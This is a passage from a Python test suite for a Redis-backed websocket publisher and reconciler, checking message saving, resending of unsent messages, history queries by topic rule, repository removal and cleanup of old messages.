                call(6, 'gim.foo', '666', 111111, b=222222, ws_extra={'topic': 'gim.foo', 'msg_id': 6}),
                call(7, 'gim.baz', None, 1111111, b=2222222, ws_extra={'topic': 'gim.baz', 'msg_id': 7}),
            ])
    def test_publish_send_unsent_messages(self):
        """A real publish first flushes the messages that could not be sent before."""
        # Send some messages
        with patch.object(self.publisher.http_client, 'publish'):
            self.publisher.publish('foo', 666, 1, b=2)  # id 1
            self.publisher.publish('foo', 666, 11, b=22)  # id 2
            self.publisher.publish('foo', 666, 111, b=222)  # id 3
            self.publisher.publish('foo2', 666, 1111, b=2222)  # id 4
        # Fake send more messages (they stay unsent)
        with patch.object(self.publisher, 'send_message'):
            self.publisher.publish('bar', 667, 11111, b=22222)  # id 5
            self.publisher.publish('foo', 666, 111111, b=222222)  # id 6
            self.publisher.publish('baz', None, 1111111, b=2222222)  # id 7
        # Send one with sending reactivated: ids 5-7 are flushed before id 8
        with patch.object(self.publisher.http_client, 'publish') as publish:
            self.publisher.publish('baz2', None, 11111111, b=22222222)  # id 8
            self.assertEqual(publish.call_args_list, [
                call('gim.bar', 11111, b=22222, ws_extra={'msg_id': 5, 'topic': 'gim.bar'}),
                call('gim.foo', 111111, b=222222, ws_extra={'msg_id': 6, 'topic': 'gim.foo'}),
                call('gim.baz', 1111111, b=2222222, ws_extra={'msg_id': 7, 'topic': 'gim.baz'}),
                call('gim.baz2', 11111111, b=22222222, ws_extra={'msg_id': 8, 'topic': 'gim.baz2'}),
            ])
    def test_get_messages(self):
        """`get_messages` returns tuples of
        (msg_id, payload, topic, matched_rules, repository_id)."""
        # Send two messages
        with patch.object(self.publisher.http_client, 'publish'):
            self.publisher.publish('foo', 666, 1, b=2)  # id 1
            self.publisher.publish('foo', 666, 11, b=22)  # id 2
        # Fake send more messages
        with patch.object(self.publisher, 'send_message'):
            # And don't try to send unsent messages for now
            with patch.object(self.publisher, 'send_unsent_messages'):
                self.publisher.publish('foo', 666, 111, b=222)  # id 3
                self.publisher.publish('foo2', 666, 1111, b=2222)  # id 4
                self.publisher.publish('bar', 667, 11111, b=22222)  # id 5
                self.publisher.publish('foo', 666, 111111, b=222222)  # id 6
                self.publisher.publish('baz', None, 1111111, b=2222222)  # id 7
                self.publisher.publish('baz2', None, 11111111, b=22222222)  # id 8
        # Explicit bounds, no topic rules: everything in [3, 7]
        result = self.publisher.get_messages(3, 7)
        self.assertEqual(result, [
            (3, {'topic': 'gim.foo', 'msg_id': 3, 'args': [111], 'kwargs': {'b': 222}},
             'gim.foo', [], '666'),
            (4, {'topic': 'gim.foo2', 'msg_id': 4, 'args': [1111], 'kwargs': {'b': 2222}},
             'gim.foo2', [], '666'),
            (5, {'topic': 'gim.bar', 'msg_id': 5, 'args': [11111], 'kwargs': {'b': 22222}},
             'gim.bar', [], '667'),
            (6, {'topic': 'gim.foo', 'msg_id': 6, 'args': [111111], 'kwargs': {'b': 222222}},
             'gim.foo', [], '666'),
            (7, {'topic': 'gim.baz', 'msg_id': 7, 'args': [1111111], 'kwargs': {'b': 2222222}},
             'gim.baz', [], None),
        ])
        # With topic rules: only matching messages, with the matched rule attached
        result = self.publisher.get_messages(3, 7, [
            ('gim.foo', ws.TOPIC_TYPE_EXACT),
            ('gim.ba', ws.TOPIC_TYPE_PREFIX),
        ])
        self.assertEqual(result, [
            (3, {'topic': 'gim.foo', 'msg_id': 3, 'args': [111], 'kwargs': {'b': 222}},
             'gim.foo', [('gim.foo', ws.TOPIC_TYPE_EXACT), ], '666'),
            (5, {'topic': 'gim.bar', 'msg_id': 5, 'args': [11111], 'kwargs': {'b': 22222}},
             'gim.bar', [('gim.ba', ws.TOPIC_TYPE_PREFIX), ], '667'),
            (6, {'topic': 'gim.foo', 'msg_id': 6, 'args': [111111], 'kwargs': {'b': 222222}},
             'gim.foo', [('gim.foo', ws.TOPIC_TYPE_EXACT), ], '666'),
            (7, {'topic': 'gim.baz', 'msg_id': 7, 'args': [1111111], 'kwargs': {'b': 2222222}},
             'gim.baz', [('gim.ba', ws.TOPIC_TYPE_PREFIX), ], None),
        ])
        # No bounds: everything
        result = self.publisher.get_messages()
        self.assertEqual(result, [
            (1, {'topic': 'gim.foo', 'msg_id': 1, 'args': [1], 'kwargs': {'b': 2}},
             'gim.foo', [], '666'),
            (2, {'topic': 'gim.foo', 'msg_id': 2, 'args': [11], 'kwargs': {'b': 22}},
             'gim.foo', [], '666'),
            (3, {'topic': 'gim.foo', 'msg_id': 3, 'args': [111], 'kwargs': {'b': 222}},
             'gim.foo', [], '666'),
            (4, {'topic': 'gim.foo2', 'msg_id': 4, 'args': [1111], 'kwargs': {'b': 2222}},
             'gim.foo2', [], '666'),
            (5, {'topic': 'gim.bar', 'msg_id': 5, 'args': [11111], 'kwargs': {'b': 22222}},
             'gim.bar', [], '667'),
            (6, {'topic': 'gim.foo', 'msg_id': 6, 'args': [111111], 'kwargs': {'b': 222222}},
             'gim.foo', [], '666'),
            (7, {'topic': 'gim.baz', 'msg_id': 7, 'args': [1111111], 'kwargs': {'b': 2222222}},
             'gim.baz', [], None),
            (8, {'topic': 'gim.baz2', 'msg_id': 8, 'args': [11111111], 'kwargs': {'b': 22222222}},
             'gim.baz2', [], None),
        ])
        # Only a lower bound
        result = self.publisher.get_messages(first_msg_id=7)
        self.assertEqual(result, [
            (7, {'topic': 'gim.baz', 'msg_id': 7, 'args': [1111111], 'kwargs': {'b': 2222222}},
             'gim.baz', [], None),
            (8, {'topic': 'gim.baz2', 'msg_id': 8, 'args': [11111111], 'kwargs': {'b': 22222222}},
             'gim.baz2', [], None),
        ])
        # Only an upper bound
        result = self.publisher.get_messages(last_msg_id=2)
        self.assertEqual(result, [
            (1, {'topic': 'gim.foo', 'msg_id': 1, 'args': [1], 'kwargs': {'b': 2}},
             'gim.foo', [], '666'),
            (2, {'topic': 'gim.foo', 'msg_id': 2, 'args': [11], 'kwargs': {'b': 22}},
             'gim.foo', [], '666'),
        ])
    def test_remove_repository(self):
        """Removing a repository deletes its history and clears the repository
        part of its entries in the global message index."""
        # Add some messages
        with patch.object(self.publisher.http_client, 'publish'):
            self.publisher.publish('foo', 666, 1, b=2)  # id 1
            self.publisher.publish('foo', 667, 11, b=22)  # id 2
            self.publisher.publish('foo', None, 111, b=222)  # id 3
            self.publisher.publish('bar', 666, 1111, b=2222)  # id 4
            self.publisher.publish('bar', 667, 11111, b=22222)  # id 5
            self.publisher.publish('bar', None, 111111, b=222222)  # id 6
        self.publisher.remove_repository(667)
        # The repository must have been deleted
        with self.assertRaises(DoesNotExist):
            ws.RepositoryHistory.get(667)
        # No traces of the repository in the publisher: entries for ids 2 and 5
        # (previously '2:667' and '5:667') lost their repository part
        repositories = self.publisher.repositories.zrange(0, -1, withscores=True)
        self.assertEqual(repositories, [
            ('1:666', 1),
            ('2:', 2),
            ('3:', 3),
            ('4:666', 4),
            ('5:', 5),
            ('6:', 6),
        ])
    def test_clean(self):
        """`clean` removes every message with an id below the given threshold,
        both from the global store and from each repository history."""
        # Set some topics for the publisher (without repository)
        messages_foo = self.publisher.messages.get_for('foo')
        messages_bar = self.publisher.messages.get_for('bar.xxx')
        # With messages
        messages_foo.zadd(20, json.dumps({'foo': 'msg-2'}))
        self.publisher.repositories.zadd(20, '20:')
        messages_bar.zadd(30, json.dumps({'bar': 'msg-3'}))
        self.publisher.repositories.zadd(30, '30:')
        messages_foo.zadd(40, json.dumps({'foo': 'msg-4'}))
        self.publisher.repositories.zadd(40, '40:')
        messages_foo.zadd(50, json.dumps({'foo': 'msg-5'}))
        self.publisher.repositories.zadd(50, '50:')
        # Same for some repositories too
        repo1 = ws.RepositoryHistory(pk=666)
        messages_foo = repo1.messages.get_for('foo')
        messages_bar = repo1.messages.get_for('bar.xxx')
        messages_foo.zadd(21, json.dumps({'foo': 'msg-2'}))
        self.publisher.repositories.zadd(21, '21:666')
        messages_bar.zadd(31, json.dumps({'bar': 'msg-3'}))
        self.publisher.repositories.zadd(31, '31:666')
        messages_foo.zadd(41, json.dumps({'foo': 'msg-4'}))
        self.publisher.repositories.zadd(41, '41:666')
        messages_foo.zadd(51, json.dumps({'foo': 'msg-5'}))
        self.publisher.repositories.zadd(51, '51:666')
        repo2 = ws.RepositoryHistory(pk=667)
        messages_foo = repo2.messages.get_for('foo')
        messages_bar = repo2.messages.get_for('bar.xxx')
        messages_foo.zadd(22, json.dumps({'foo': 'msg-2'}))
        self.publisher.repositories.zadd(22, '22:667')
        messages_bar.zadd(32, json.dumps({'bar': 'msg-3'}))
        self.publisher.repositories.zadd(32, '32:667')
        messages_foo.zadd(42, json.dumps({'foo': 'msg-4'}))
        self.publisher.repositories.zadd(42, '42:667')
        messages_foo.zadd(52, json.dumps({'foo': 'msg-5'}))
        self.publisher.repositories.zadd(52, '52:667')
        # Ids below 35: 20, 30, 21, 31, 22, 32 -> 6 deletions
        deleted = self.publisher.clean(35)
        self.assertEqual(deleted, 6)
        # No trace of the deleted messages anymore
        ids = self.publisher.get_all_message_ids()
        self.assertEqual(set(ids), {40, 50})
        # Same for repositories
        ids = repo1.get_all_message_ids()
        self.assertEqual(set(ids), {41, 51})
        ids = repo2.get_all_message_ids()
        self.assertEqual(set(ids), {42, 52})
        # Check also in the main zset containing all messages
        entries = self.publisher.repositories.zrange(0, -1, withscores=True)
        self.assertEqual(entries, [
            (u'40:', 40.0),
            (u'41:666', 41.0),
            (u'42:667', 42.0),
            (u'50:', 50.0),
            (u'51:666', 51.0),
            (u'52:667', 52.0),
        ])
class FakeCrossbar:
    """Minimal stand-in for the crossbar application used by the async tests.

    `publish` accepts any topic/args/kwargs and does nothing.
    """
    @inlineCallbacks
    def publish(self, topic, *args, **kwargs):
        # `inlineCallbacks` requires the decorated function to return a
        # generator: the original plain `pass` body would make Twisted raise a
        # TypeError if `publish` were ever called without being patched. The
        # unreachable `yield` turns this into a generator that finishes
        # immediately with a None result.
        return
        yield
class AsyncPublisherTestCase(UsingAsyncRedis):
    """Async (Twisted/txredis) counterpart of the synchronous Publisher tests."""

    # Primary key shared with the sync publisher, and its string form as
    # stored in redis.
    PK = ws.Publisher.PK
    sPK = str(PK)

    @inlineCallbacks
    def setUp(self):
        yield super(AsyncPublisherTestCase, self).setUp()
        self.app = FakeCrossbar()
        self.publisher = yield ws.AsyncPublisher.get_for(self.PK, app=self.app)

    @inlineCallbacks
    def test_get_for_without_pipeline(self):
        """`get_for` always resolves to the singleton publisher, whatever the pk."""
        # Existing entry
        result = yield ws.AsyncPublisher.get_for(666, app=self.app)
        self.assertIsInstance(result.source_object, ws.Publisher)
        self.assertEqual(result.source_object._pk, self.sPK)
        # Without pk
        result = yield ws.AsyncPublisher.get_for(app=self.app)
        self.assertIsInstance(result.source_object, ws.Publisher)
        self.assertEqual(result.source_object._pk, self.sPK)
        # Non existing entry
        self.flushdb()
        result = yield ws.AsyncPublisher.get_for(667, app=self.app)
        self.assertIsInstance(result.source_object, ws.Publisher)
        self.assertEqual(result.source_object._pk, self.sPK)

    @inlineCallbacks
    def test_get_for_with_pipeline(self):
        pipeline = yield self.db.multi()
        result = yield ws.AsyncPublisher.get_for(666, pipeline=pipeline, app=self.app)
        yield pipeline.commit()
        self.assertIsInstance(result.source_object, ws.Publisher)
        self.assertEqual(result.source_object._pk, self.sPK)

    def assert_called_once_with_pipeline(self, patched, *args, **kwargs):
        # Helper: like `assert_called_once_with`, but accepts any pipeline
        # instance for the `pipeline` keyword argument.
        self.assertEqual(patched.call_count, 1)
        self.assertEqual(patched.call_args[0], args)
        call_kwargs = patched.call_args[1].copy()
        self.assertIsInstance(call_kwargs.pop('pipeline'), txredis.BaseRedisProtocol)
        self.assertEqual(call_kwargs, kwargs)

    def test_lock_key(self):
        self.assertEqual(self.publisher.lock_key, 'ws4:publisher:%s:lock' % self.sPK)

    def test_lock_publishing(self):
        lock = self.publisher.lock_publishing()
        self.assertIsInstance(lock, ws.txLock)
        self.assertEqual(lock.name, self.publisher.lock_key)

    @inlineCallbacks
    def test_save_message_for_repository(self):
        """A message saved for a repository is delegated to its async history."""
        with patch.object(ws.AsyncRepositoryHistory, 'save_message') as repository_save_message:
            msg_id = yield self.publisher.save_message('foo', 666, 11, b=22)
            self.assertEqual(msg_id, 1)
            result = yield self.publisher.get_last_msg_id()
            self.assertEqual(result, 1)
            # Check the message id is tied to the repository
            repositories = yield self.db.zrange(self.publisher.source_object.repositories.key, 0, -1,
                                                withscores=True)
            self.assertEqual(repositories, [
                ('1:666', 1)
            ])
            # We should have called `save_message` for the repository
            self.assert_called_once_with_pipeline(repository_save_message, 1, 'foo', 11, b=22)
            # And the message should not be stored in the global store
            messages = yield self.db.zrange(self.publisher.source_object.messages.get_for('foo').key,
                                            0, -1, withscores=True)
            self.assertEqual(messages, [])

    @inlineCallbacks
    def test_save_message_not_for_repository(self):
        """Without a repository the message only goes to the global store."""
        # NOTE(review): this patches the sync `ws.RepositoryHistory` while the
        # test above patches `ws.AsyncRepositoryHistory` — acceptable here since
        # no call is expected either way, but confirm it was not meant to be
        # the async class.
        with patch.object(ws.RepositoryHistory, 'save_message') as repository_save_message:
            msg_id = yield self.publisher.save_message('foo', None, 11, b=22)
            self.assertEqual(msg_id, 1)
            result = yield self.publisher.get_last_msg_id()
            self.assertEqual(result, 1)
            # Check the message id is NOT tied to the repository
            repositories = yield self.db.zrange(self.publisher.source_object.repositories.key, 0, -1,
                                                withscores=True)
            self.assertEqual(repositories, [
                ('1:', 1)
            ])
            # We should have NOT called `save_message` for the repository
            self.assertEqual(repository_save_message.call_count, 0)
            # But the message should be stored in the global store
            messages = yield self.db.zrange(self.publisher.source_object.messages.get_for('foo').key,
                                            0, -1, withscores=True)
            self.assertEqual(messages, [
                (ws.serialize(1, 'foo', 11, b=22), 1),
            ])

    @inlineCallbacks
    def test_send_message_for_repository(self):
        with patch.object(FakeCrossbar, 'publish') as publish:
            yield self.publisher.send_message(123, 'foo', 666, 11, b=22)
            # We published to crossbar
            publish.assert_called_once_with('foo', 11, b=22)
            # We saved the last message for the repository
            obj = yield ws.AsyncRepositoryHistory.get_for(666)
            last_msg_id_sent = yield obj.get_last_msg_id_sent()
            self.assertEqual(last_msg_id_sent, 123)
            # And globally
            last_msg_id_sent = yield self.publisher.get_last_msg_id_sent()
            self.assertEqual(last_msg_id_sent, 123)

    @inlineCallbacks
    def test_send_message_not_for_repository(self):
        with patch.object(FakeCrossbar, 'publish') as publish:
            with patch.object(ws.RepositoryHistory, 'save_last_sent_message') as \
                    repository_save_last_sent_message:
                yield self.publisher.send_message(123, 'foo', None, 11, b=22)
                # We published to crossbar
                publish.assert_called_once_with('foo', 11, b=22)
                # We DIDN'T save the last message for any repository
                self.assertEqual(repository_save_last_sent_message.call_count, 0)
                # But globally
                last_msg_id_sent = yield self.publisher.get_last_msg_id_sent()
                self.assertEqual(last_msg_id_sent, 123)

    @inlineCallbacks
    def test_send_messages(self):
        messages = [
            (5, 'gim.bar', '667', [1], {'b': 2}),
            (6, 'gim.foo', '666', [11], {'b': 22}),
            (7, 'gim.baz', None, [111], {'b': 222}),
        ]
        with patch.object(self.publisher, 'send_message') as send_message:
            yield self.publisher.send_messages(messages)
            self.assertEqual(send_message.call_args_list, [
                call(5, 'gim.bar', '667', 1, b=2, ws_extra={'topic': 'gim.bar', 'msg_id': 5}),
                call(6, 'gim.foo', '666', 11, b=22, ws_extra={'topic': 'gim.foo', 'msg_id': 6}),
                call(7, 'gim.baz', None, 111, b=222, ws_extra={'topic': 'gim.baz', 'msg_id': 7}),
            ])

    @inlineCallbacks
    def test_publish_for_repository(self):
        with patch.object(self.publisher, 'save_message', return_value=123) as save_message:
            with patch.object(self.publisher, 'send_message') as send_message:
                with patch.object(self.publisher, 'send_unsent_messages') as send_unsent_messages:
                    msg_id = yield self.publisher.publish('foo', 666, 11, b=22)
                    self.assertEqual(msg_id, 123)
                    send_unsent_messages.assert_called_once_with()
                    save_message.assert_called_once_with('gim.foo', 666, 11, b=22)
                    send_message.assert_called_once_with(123, 'gim.foo', 666, 11, b=22,
                                                         ws_extra={'msg_id': 123, 'topic': 'gim.foo'})

    @inlineCallbacks
    def test_publish_not_for_repository(self):
        with patch.object(self.publisher, 'save_message', return_value=123) as save_message:
            with patch.object(self.publisher, 'send_message') as send_message:
                with patch.object(self.publisher, 'send_unsent_messages') as send_unsent_messages:
                    msg_id = yield self.publisher.publish('foo', None, 11, b=22)
                    self.assertEqual(msg_id, 123)
                    send_unsent_messages.assert_called_once_with()
                    save_message.assert_called_once_with('gim.foo', None, 11, b=22)
                    send_message.assert_called_once_with(123, 'gim.foo', None, 11, b=22,
                                                         ws_extra={'msg_id': 123, 'topic': 'gim.foo'})

    @inlineCallbacks
    def test_get_unsent_bounds(self):
        with patch.object(self.publisher, 'get_last_msg_id', return_value=10):
            with patch.object(self.publisher, 'get_last_msg_id_sent', return_value=5):
                result = yield self.publisher.get_unsent_bounds()
                self.assertEqual(result, (6, 10))
        with patch.object(self.publisher, 'get_last_msg_id', return_value=10):
            with patch.object(self.publisher, 'get_last_msg_id_sent', return_value=10):
                result = yield self.publisher.get_unsent_bounds()
                self.assertEqual(result, (11, 10))

    @inlineCallbacks
    def test_send_unsent_messages(self):
        # Send some messages
        with patch.object(FakeCrossbar, 'publish'):
            yield self.publisher.publish('foo', 666, 1, b=2)  # id 1
            yield self.publisher.publish('foo', 666, 11, b=22)  # id 2
            yield self.publisher.publish('foo', 666, 111, b=222)  # id 3
            yield self.publisher.publish('foo2', 666, 1111, b=2222)  # id 4
        # Send unsent ones: there is no unsent message
        with patch.object(self.publisher, 'send_messages') as send_messages:
            yield self.publisher.send_unsent_messages()
            self.assertEqual(send_messages.call_count, 0)
        # Fake send more messages (patched `send_message` keeps them "unsent")
        with patch.object(self.publisher, 'send_message'):
            # And don't try to send unsent messages for now
            with patch.object(self.publisher, 'send_unsent_messages'):
                yield self.publisher.publish('bar', 667, 11111, b=22222)  # id 5
                yield self.publisher.publish('foo', 666, 111111, b=222222)  # id 6
                yield self.publisher.publish('baz', None, 1111111, b=2222222)  # id 7
        # Send unsent ones: there are 3 unsent messages
        with patch.object(self.publisher, 'send_message') as send_message:
            yield self.publisher.send_unsent_messages()
            self.assertEqual(send_message.call_args_list, [
                call(5, 'gim.bar', '667', 11111, b=22222, ws_extra={'topic': 'gim.bar', 'msg_id': 5}),
                call(6, 'gim.foo', '666', 111111, b=222222, ws_extra={'topic': 'gim.foo', 'msg_id': 6}),
                call(7, 'gim.baz', None, 1111111, b=2222222, ws_extra={'topic': 'gim.baz', 'msg_id': 7}),
            ])

    @inlineCallbacks
    def test_publish_send_unsent_messages(self):
        # Send some messages
        with patch.object(FakeCrossbar, 'publish'):
            yield self.publisher.publish('foo', 666, 1, b=2)  # id 1
            yield self.publisher.publish('foo', 666, 11, b=22)  # id 2
            yield self.publisher.publish('foo', 666, 111, b=222)  # id 3
            yield self.publisher.publish('foo2', 666, 1111, b=2222)  # id 4
        # Fake send more messages (they stay unsent)
        with patch.object(self.publisher, 'send_message'):
            yield self.publisher.publish('bar', 667, 11111, b=22222)  # id 5
            yield self.publisher.publish('foo', 666, 111111, b=222222)  # id 6
            yield self.publisher.publish('baz', None, 1111111, b=2222222)  # id 7
        # Send one with sending reactivated: ids 5-7 are flushed before id 8
        with patch.object(FakeCrossbar, 'publish') as publish:
            yield self.publisher.publish('baz2', None, 11111111, b=22222222)  # id 8
            self.assertEqual(publish.call_args_list, [
                call('gim.bar', 11111, b=22222, ws_extra={'msg_id': 5, 'topic': 'gim.bar'}),
                call('gim.foo', 111111, b=222222, ws_extra={'msg_id': 6, 'topic': 'gim.foo'}),
                call('gim.baz', 1111111, b=2222222, ws_extra={'msg_id': 7, 'topic': 'gim.baz'}),
                call('gim.baz2', 11111111, b=22222222, ws_extra={'msg_id': 8, 'topic': 'gim.baz2'}),
            ])

    @inlineCallbacks
    def test_get_messages(self):
        # Send two messages
        with patch.object(FakeCrossbar, 'publish'):
            yield self.publisher.publish('foo', 666, 1, b=2)  # id 1
            yield self.publisher.publish('foo', 666, 11, b=22)  # id 2
        # Fake send more messages
        with patch.object(self.publisher, 'send_message'):
            # And don't try to send unsent messages for now
            with patch.object(self.publisher, 'send_unsent_messages'):
                yield self.publisher.publish('foo', 666, 111, b=222)  # id 3
                yield self.publisher.publish('foo2', 666, 1111, b=2222)  # id 4
                yield self.publisher.publish('bar', 667, 11111, b=22222)  # id 5
                yield self.publisher.publish('foo', 666, 111111, b=222222)  # id 6
                yield self.publisher.publish('baz', None, 1111111, b=2222222)  # id 7
                yield self.publisher.publish('baz2', None, 11111111, b=22222222)  # id 8
        # Explicit bounds, no topic rules
        result = yield self.publisher.get_messages(3, 7)
        self.assertEqual(result, [
            (3, {'topic': 'gim.foo', 'msg_id': 3, 'args': [111], 'kwargs': {'b': 222}},
             'gim.foo', [], '666'),
            (4, {'topic': 'gim.foo2', 'msg_id': 4, 'args': [1111], 'kwargs': {'b': 2222}},
             'gim.foo2', [], '666'),
            (5, {'topic': 'gim.bar', 'msg_id': 5, 'args': [11111], 'kwargs': {'b': 22222}},
             'gim.bar', [], '667'),
            (6, {'topic': 'gim.foo', 'msg_id': 6, 'args': [111111], 'kwargs': {'b': 222222}},
             'gim.foo', [], '666'),
            (7, {'topic': 'gim.baz', 'msg_id': 7, 'args': [1111111], 'kwargs': {'b': 2222222}},
             'gim.baz', [], None),
        ])
        # With topic rules: only matching messages, with the matched rule attached
        result = yield self.publisher.get_messages(3, 7, [
            ('gim.foo', ws.TOPIC_TYPE_EXACT),
            ('gim.ba', ws.TOPIC_TYPE_PREFIX),
        ])
        self.assertEqual(result, [
            (3, {'topic': 'gim.foo', 'msg_id': 3, 'args': [111], 'kwargs': {'b': 222}},
             'gim.foo', [('gim.foo', ws.TOPIC_TYPE_EXACT), ], '666'),
            (5, {'topic': 'gim.bar', 'msg_id': 5, 'args': [11111], 'kwargs': {'b': 22222}},
             'gim.bar', [('gim.ba', ws.TOPIC_TYPE_PREFIX), ], '667'),
            (6, {'topic': 'gim.foo', 'msg_id': 6, 'args': [111111], 'kwargs': {'b': 222222}},
             'gim.foo', [('gim.foo', ws.TOPIC_TYPE_EXACT), ], '666'),
            (7, {'topic': 'gim.baz', 'msg_id': 7, 'args': [1111111], 'kwargs': {'b': 2222222}},
             'gim.baz', [('gim.ba', ws.TOPIC_TYPE_PREFIX), ], None),
        ])
        # No bounds: everything
        result = yield self.publisher.get_messages()
        self.assertEqual(result, [
            (1, {'topic': 'gim.foo', 'msg_id': 1, 'args': [1], 'kwargs': {'b': 2}},
             'gim.foo', [], '666'),
            (2, {'topic': 'gim.foo', 'msg_id': 2, 'args': [11], 'kwargs': {'b': 22}},
             'gim.foo', [], '666'),
            (3, {'topic': 'gim.foo', 'msg_id': 3, 'args': [111], 'kwargs': {'b': 222}},
             'gim.foo', [], '666'),
            (4, {'topic': 'gim.foo2', 'msg_id': 4, 'args': [1111], 'kwargs': {'b': 2222}},
             'gim.foo2', [], '666'),
            (5, {'topic': 'gim.bar', 'msg_id': 5, 'args': [11111], 'kwargs': {'b': 22222}},
             'gim.bar', [], '667'),
            (6, {'topic': 'gim.foo', 'msg_id': 6, 'args': [111111], 'kwargs': {'b': 222222}},
             'gim.foo', [], '666'),
            (7, {'topic': 'gim.baz', 'msg_id': 7, 'args': [1111111], 'kwargs': {'b': 2222222}},
             'gim.baz', [], None),
            (8, {'topic': 'gim.baz2', 'msg_id': 8, 'args': [11111111], 'kwargs': {'b': 22222222}},
             'gim.baz2', [], None),
        ])
        # Only a lower bound
        result = yield self.publisher.get_messages(first_msg_id=7)
        self.assertEqual(result, [
            (7, {'topic': 'gim.baz', 'msg_id': 7, 'args': [1111111], 'kwargs': {'b': 2222222}},
             'gim.baz', [], None),
            (8, {'topic': 'gim.baz2', 'msg_id': 8, 'args': [11111111], 'kwargs': {'b': 22222222}},
             'gim.baz2', [], None),
        ])
        # Only an upper bound
        result = yield self.publisher.get_messages(last_msg_id=2)
        self.assertEqual(result, [
            (1, {'topic': 'gim.foo', 'msg_id': 1, 'args': [1], 'kwargs': {'b': 2}},
             'gim.foo', [], '666'),
            (2, {'topic': 'gim.foo', 'msg_id': 2, 'args': [11], 'kwargs': {'b': 22}},
             'gim.foo', [], '666'),
        ])

    @inlineCallbacks
    def test_remove_repository(self):
        # Add some messages
        with patch.object(FakeCrossbar, 'publish'):
            yield self.publisher.publish('foo', 666, 1, b=2)  # id 1
            yield self.publisher.publish('foo', 667, 11, b=22)  # id 2
            yield self.publisher.publish('foo', None, 111, b=222)  # id 3
            yield self.publisher.publish('bar', 666, 1111, b=2222)  # id 4
            yield self.publisher.publish('bar', 667, 11111, b=22222)  # id 5
            yield self.publisher.publish('bar', None, 111111, b=222222)  # id 6
        repository = yield ws.AsyncRepositoryHistory.get_for(667)
        yield self.publisher.remove_repository(667)
        # The repository must have been deleted (only 666 left in the collection)
        collection = yield self.db.smembers(repository.source_object.pk.collection_key)
        self.assertEqual(collection, {666})
        # No traces of the repository in the publisher
        repositories = yield self.db.zrange(self.publisher.source_object.repositories.key, 0, -1,
                                            withscores=True)
        self.assertEqual(repositories, [
            ('1:666', 1),
            ('2:', 2),
            ('3:', 3),
            ('4:666', 4),
            ('5:', 5),
            ('6:', 6),
        ])
class ReconcilerTestCase(UsingAsyncRedis):
    """Tests for the reconciliation of missed messages after a client reconnects."""

    @inlineCallbacks
    def setUp(self):
        yield super(ReconcilerTestCase, self).setUp()
        self.app = FakeCrossbar()
        self.publisher = yield ws.AsyncPublisher.get_for(app=self.app)
        self.reconciler = ws.Reconciler(self.publisher)

    def test_limit_rules(self):
        """Only the most specific subscription rules are kept."""
        result = self.reconciler.limit_rules([
            ('gim.front.foo', ws.TOPIC_TYPE_EXACT),
            ('gim.foo', ws.TOPIC_TYPE_EXACT),
            ('gim.front.bar', ws.TOPIC_TYPE_WILDCARD),
            ('gim.', ws.TOPIC_TYPE_PREFIX),
            ('gim.front.foo..bar', ws.TOPIC_TYPE_WILDCARD),
            ('gim.front.foo', ws.TOPIC_TYPE_PREFIX),
        ])
        self.assertEqual(result, {
            ('gim.front.foo', ws.TOPIC_TYPE_EXACT),
            ('gim.front.foo..bar', ws.TOPIC_TYPE_WILDCARD),
            ('gim.front.foo', ws.TOPIC_TYPE_PREFIX),
        })

    @inlineCallbacks
    def test_validate_ids(self):
        """Ids must be ints (REC0001), be within the known history (REC0002),
        and the next id must exist when given (REC0003)."""
        valid, error = yield self.reconciler.validate_ids('a')
        self.assertFalse(valid)
        self.assertIsInstance(error, dict)
        self.assertEqual(error.keys(), ['error'])
        self.assertEqual(error['error']['code'], 'REC0001')
        valid, error = yield self.reconciler.validate_ids(1, 'b')
        self.assertFalse(valid)
        self.assertEqual(error['error']['code'], 'REC0001')
        valid, error = yield self.reconciler.validate_ids(3, 3)
        self.assertFalse(valid)
        self.assertEqual(error['error']['code'], 'REC0001')
        valid, error = yield self.reconciler.validate_ids(4, 3)
        self.assertFalse(valid)
        self.assertEqual(error['error']['code'], 'REC0001')
        # Simulate 2 sent messages, with id 2 and 3
        yield self.db.zadd(self.publisher.source_object.repositories.key, 2, '2:')
        yield self.db.zadd(self.publisher.source_object.repositories.key, 3, '3:')
        valid, error = yield self.reconciler.validate_ids(1)
        self.assertFalse(valid)
        self.assertEqual(error['error']['code'], 'REC0002')
        valid, error = yield self.reconciler.validate_ids(1, 4)
        self.assertFalse(valid)
        self.assertEqual(error['error']['code'], 'REC0002')
        valid, error = yield self.reconciler.validate_ids(2)
        self.assertTrue(valid)
        self.assertIsNone(error)
        valid, error = yield self.reconciler.validate_ids(2, 3)
        self.assertTrue(valid)
        self.assertIsNone(error)
        valid, error = yield self.reconciler.validate_ids(2, 4)
        self.assertFalse(valid)
        self.assertEqual(error['error']['code'], 'REC0003')

    def test_prepare_messages(self):
        """Messages are converted to args/kwargs dicts with the subscription
        rules injected under `ws_extra['subscribed']`."""
        messages = [
            (6, {'topic': 'gim.foo', 'msg_id': 6, 'args': [111111], 'kwargs': {'b': 222222}},
             'gim.foo', [('gim.foo', ws.TOPIC_TYPE_EXACT), ], '666'),
            (7, {'topic': 'gim.baz', 'msg_id': 7, 'args': [1111111], 'kwargs': {'b': 2222222}},
             'gim.baz', [('gim.ba', ws.TOPIC_TYPE_PREFIX), ], None),
        ]
        result = self.reconciler.prepare_messages(messages)
        self.assertEqual(result, [
            {'args': [111111], 'kwargs': {'b': 222222,
                'ws_extra': {'topic': 'gim.foo', 'msg_id': 6,
                    'subscribed': [('gim.foo', ws.TOPIC_TYPE_EXACT), ]}}},
            {'args': [1111111], 'kwargs': {'b': 2222222,
                'ws_extra': {'topic': 'gim.baz', 'msg_id': 7,
                    'subscribed': [('gim.ba', ws.TOPIC_TYPE_PREFIX), ]}}},
        ])

    @inlineCallbacks
    def test_get_data(self):
        # Start at id 2 to test reconciliation with previous id
        self.db.set(self.publisher.source_object.last_msg_id.key, 2)
        # Send some messages
        with patch.object(FakeCrossbar, 'publish'):
            yield self.publisher.publish('front.foo', 666, 111, b=222)  # id 3
            yield self.publisher.publish('front.foo2', 666, 1111, b=2222)  # id 4
            yield self.publisher.publish('front.bar', 667, 11111, b=22222)  # id 5
            yield self.publisher.publish('front.foo', 666, 111111, b=222222)  # id 6
            yield self.publisher.publish('front.baz', None, 1111111, b=2222222)  # id 7
            yield self.publisher.publish('front.baz2', None, 11111111, b=22222222)  # id 8
        # from_msg_id too low
        result = yield self.reconciler.get_data(last_received_id=1, next_received_id=None,
                                                topics_rules=[
                                                    ('gim.front.foo', ws.TOPIC_TYPE_EXACT),
                                                    ('gim.front.ba', ws.TOPIC_TYPE_PREFIX),
                                                ], iteration=1)
        self.assertIsInstance(result, dict)
